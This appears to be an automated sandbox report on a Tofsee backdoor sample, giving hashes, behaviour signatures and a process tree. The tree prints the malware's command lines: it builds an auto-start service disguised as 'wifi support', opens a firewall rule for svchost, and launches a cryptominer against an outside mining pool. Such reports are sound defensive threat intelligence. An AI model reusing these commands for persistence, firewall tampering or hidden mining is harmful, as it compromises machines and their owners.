Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-11-2020 15:59

General

  • Target

    f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe

  • Size

    11.9MB

  • MD5

    9654ddf379a2487d9e914298a5793eb7

  • SHA1

    0bcb76ef01d5085380a5dfb959f061d6aae86765

  • SHA256

    f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2

  • SHA512

    d662b168f8520df61973089618801719fc3503dbc0b75e2382543b7087801c433f7c6a717e0412c34563dd174158512f542e5efb8438f322e70d183128f6aa6a

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    sc.exe is a Windows utility used to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe
    "C:\Users\Admin\AppData\Local\Temp\f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4708
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\obxawhzc\
      2⤵
      PID:940
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uboorcup.exe" C:\Windows\SysWOW64\obxawhzc\
      2⤵
      PID:3780
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create obxawhzc binPath= "C:\Windows\SysWOW64\obxawhzc\uboorcup.exe /d\"C:\Users\Admin\AppData\Local\Temp\f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:788
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description obxawhzc "wifi internet conection"
      2⤵
      PID:3912
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start obxawhzc
      2⤵
      PID:2108
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:860
  • C:\Windows\SysWOW64\obxawhzc\uboorcup.exe
    C:\Windows\SysWOW64\obxawhzc\uboorcup.exe /d"C:\Users\Admin\AppData\Local\Temp\f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:536
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Modifies service
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:640
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4440

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\uboorcup.exe

    MD5

    fd38926ae614f45f761de204abd52ae9

    SHA1

    fba9690667f1da649b72e7e1efcd64adabe0d618

    SHA256

    ea1fb6f4688f3e57e5410d10c901fac9581047749b2faa49622b684b0e31ae38

    SHA512

    fdbe78d398d986c7b6f4747aca19a164fc3cde8c4ab965c9982bf366b7f87c18705660d4a7379780fbd8a6869f51547f9d0032e3dc2e62fe34cce5223672f734

  • C:\Windows\SysWOW64\obxawhzc\uboorcup.exe

    MD5

    fd38926ae614f45f761de204abd52ae9

    SHA1

    fba9690667f1da649b72e7e1efcd64adabe0d618

    SHA256

    ea1fb6f4688f3e57e5410d10c901fac9581047749b2faa49622b684b0e31ae38

    SHA512

    fdbe78d398d986c7b6f4747aca19a164fc3cde8c4ab965c9982bf366b7f87c18705660d4a7379780fbd8a6869f51547f9d0032e3dc2e62fe34cce5223672f734

  • memory/640-13-0x0000000000BF0000-0x0000000000C00000-memory.dmp

    Filesize

    64KB

  • memory/640-16-0x00000000036D0000-0x00000000036D7000-memory.dmp

    Filesize

    28KB

  • memory/640-15-0x0000000008F90000-0x000000000939B000-memory.dmp

    Filesize

    4.0MB

  • memory/640-14-0x00000000035F0000-0x00000000035F5000-memory.dmp

    Filesize

    20KB

  • memory/640-7-0x0000000000A40000-0x0000000000A55000-memory.dmp

    Filesize

    84KB

  • memory/640-8-0x0000000000A49A6B-mapping.dmp

  • memory/640-11-0x0000000004840000-0x0000000004A4F000-memory.dmp

    Filesize

    2.1MB

  • memory/640-12-0x0000000000BE0000-0x0000000000BE6000-memory.dmp

    Filesize

    24KB

  • memory/788-3-0x0000000000000000-mapping.dmp

  • memory/860-10-0x0000000000000000-mapping.dmp

  • memory/940-0-0x0000000000000000-mapping.dmp

  • memory/2108-5-0x0000000000000000-mapping.dmp

  • memory/3780-1-0x0000000000000000-mapping.dmp

  • memory/3912-4-0x0000000000000000-mapping.dmp

  • memory/4440-17-0x0000000000EC0000-0x0000000000FB1000-memory.dmp

    Filesize

    964KB

  • memory/4440-19-0x0000000000F5259C-mapping.dmp